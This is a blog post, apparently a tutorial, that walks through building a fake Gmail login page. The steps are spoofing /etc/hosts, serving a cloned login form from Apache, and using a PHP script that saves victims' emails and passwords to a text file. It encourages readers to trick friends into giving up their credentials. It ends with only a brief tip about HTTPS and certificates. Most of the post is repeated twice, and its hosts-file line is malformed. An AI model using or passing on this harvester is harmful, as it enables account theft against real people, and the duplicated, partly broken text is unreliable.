With the increase in commercial transactions online and a whole lot of information online, the need to secure it also increases because it is still people on the Internet and the sense of security and insecurity is innate to our interactions.
Phishing (of course,read it as fishing :P) is one of the most treacherous menaces which could have really bad ramifications - loss of money, passwords and compromise of sensitive information.
In this post, I show how the simplest phishing trick is performed (thanks to Vignesh T Prabhu for showing me this trick), so that avoiding it can also be made effective. This trick is an offline version, and it takes simple extra gyaan to put it online.
Based on my experience with the audience I have been dealing with, I will touch upon some fundamentals like DNS, Apache Webserver, GNU/Linux directory structure and some bit of coding.
DNS Server:
Domain Name System servers are lookup tables used to map URLs to IP addresses ( a more elaborate post about it here).
For our trick here, we will need only to know that the fist level of name resolution in a GNU/Linux machine happens in the file /etc/hosts.
All GNU/Linux machines have first level DNS resolution here and standard entries might look like this :
Because in Phsihing we purport to be a webpage we are not, I usually add use the localhost as the webserver.
For instance, you could try ping google.com and it might yield a reply from a specific IP address as shown below
Here the name resolution is happening for google.com to 74.125.236.206
I our case I will try to make the localhost as google.com, for example.
Then add this entry in the /etc/hosts file
sudo nano /etc/hosts (to edit the file)
and append
google.com 127.0.0.1
save it.
where 127.0.0.1 is one of the loopback ethernet interfaces.
Now try pinging google.com, and the reply looks like this
Apache Webserver
The awesomeness of running a GNU/Linux box is in the fact that you have a "server" with you - an almost full fledged server. For our hack here, we need to be running a webserver and who else but the master of all webservers Apache runs like a charm on any GNU/Linux distro.
Install Apache (in debian based OS)
sudo apt-get install apache2
Once installed, check if the server is running - open a web browser and enter localhost, and the default page must be as shown below:
Now, also try entering google.com in the browser and it should land on the same default webpage
Now, we're ready to phish.
HTML file:
Log on to the google mail login page, and copy the source code (ctrl+u to view source code) of the file into a text document.
Find the action field and replace the google authentication URL with "phishing.php" (a php script we will be using to phish)
Save the html file as something relevant, for example login.hmtl
PHP script:
Here's a simple PHP script which will capture the login name and password on the phishing page and redirect to original authentication page.
<html>
<body>
<?php
$handle=fopen("Password.txt","a");
fwrite($handle,$_POST["Email id:"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["Password:"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle);
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>
</body>
</html>
PHP script, save it as phishing.php
Create an empty text document password.txt.
Now, copy the three files login.html, phishing.php and password.txt to the default web server location /var/www
sudo cp login.html phishing.php password.txt /var/www
The password.txt file needs to have write permissions by the phoshing.php script - a easy and lazy way to do it is
sudo chmod 777 /var/www/password.txt
Now, you can dupe any of your friends for a prank and get them login to their google mail account and check the password.txt file to know their password, without them having a doubt of what has occurred.
The solution:
HTTPS browsing is the safest means of web browsing, and a quick verification of certificates would reveal us the real identities of these webpages.
For, the original google mail page will have an SSL certificate signed and verified, where as the phishing script won't.
Use https everywhere by EFF to avoid most of the attempts :)
Phishing (of course,read it as fishing :P) is one of the most treacherous menaces which could have really bad ramifications - loss of money, passwords and compromise of sensitive information.
In this post, I show how the simplest phishing trick is performed (thanks to Vignesh T Prabhu for showing me this trick), so that avoiding it can also be made effective. This trick is an offline version, and it takes simple extra gyaan to put it online.
Based on my experience with the audience I have been dealing with, I will touch upon some fundamentals like DNS, Apache Webserver, GNU/Linux directory structure and some bit of coding.
DNS Server:
Domain Name System servers are lookup tables used to map URLs to IP addresses ( a more elaborate post about it here).
For our trick here, we will need only to know that the fist level of name resolution in a GNU/Linux machine happens in the file /etc/hosts.
All GNU/Linux machines have first level DNS resolution here and standard entries might look like this :
Because in Phsihing we purport to be a webpage we are not, I usually add use the localhost as the webserver.
For instance, you could try ping google.com and it might yield a reply from a specific IP address as shown below
I our case I will try to make the localhost as google.com, for example.
Then add this entry in the /etc/hosts file
sudo nano /etc/hosts (to edit the file)
and append
google.com 127.0.0.1
save it.
where 127.0.0.1 is one of the loopback ethernet interfaces.
Now try pinging google.com, and the reply looks like this
Apache Webserver
The awesomeness of running a GNU/Linux box is in the fact that you have a "server" with you - an almost full fledged server. For our hack here, we need to be running a webserver and who else but the master of all webservers Apache runs like a charm on any GNU/Linux distro.
Install Apache (in debian based OS)
sudo apt-get install apache2
Once installed, check if the server is running - open a web browser and enter localhost, and the default page must be as shown below:
Now, also try entering google.com in the browser and it should land on the same default webpage
Now, we're ready to phish.
HTML file:
Find the action field and replace the google authentication URL with "phishing.php" (a php script we will be using to phish)
Save the html file as something relevant, for example login.hmtl
PHP script:
Here's a simple PHP script which will capture the login name and password on the phishing page and redirect to original authentication page.
<html>
<body>
<?php
$handle=fopen("Password.txt","a");
fwrite($handle,$_POST["Email id:"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["Password:"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle);
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>
</body>
</html>
PHP script, save it as phishing.php
Create an empty text document password.txt.
Now, copy the three files login.html, phishing.php and password.txt to the default web server location /var/www
sudo cp login.html phishing.php password.txt /var/www
The password.txt file needs to have write permissions by the phoshing.php script - a easy and lazy way to do it is
sudo chmod 777 /var/www/password.txt
Now, you can dupe any of your friends for a prank and get them login to their google mail account and check the password.txt file to know their password, without them having a doubt of what has occurred.
The solution:
HTTPS browsing is the safest means of web browsing, and a quick verification of certificates would reveal us the real identities of these webpages.
For, the original google mail page will have an SSL certificate signed and verified, where as the phishing script won't.
Use https everywhere by EFF to avoid most of the attempts :)
 |
| Phishing page without secure connection and a warning |
 |
| Secure login page with SSL certification |
